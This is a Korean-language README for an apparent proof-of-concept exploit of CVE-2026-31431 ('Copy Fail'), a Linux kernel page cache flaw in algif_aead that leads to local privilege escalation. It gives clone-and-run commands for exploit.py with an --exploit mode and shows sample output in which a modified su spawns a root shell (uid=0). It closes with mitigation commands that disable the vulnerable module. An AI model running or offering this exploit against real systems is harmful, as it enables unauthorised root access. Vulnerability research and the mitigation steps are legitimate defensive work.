
CVE-2026-31431 - Linux 커널 페이지 캐시 취약점
이 프로젝트는 다음 용도로만 엄격히 제공됩니다:
저자와 기여자는 이 소프트웨어를 사용하여 발생한 오용, 손해, 데이터 손실, 서비스 중단 또는 불법 활동에 대해 책임을 지지 않습니다.
CVE-2026-31431 (일명 "Copy Fail")에 대한 개념 증명 연구 도구입니다. 이는 Linux 커널의 algif_aead / authencesn AEAD 구현에 영향을 미치는 취약점입니다.
이 취약점은 특정 조건에서 페이지 캐시 손상을 유발할 수 있으며, 취약한 시스템에서 잠재적으로 로컬 권한 상승으로 이어질 수 있습니다.
저장소를 클론합니다:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
메시지가 나타나면:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
시스템 관리자이고 노출을 완화해야 하는 경우:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null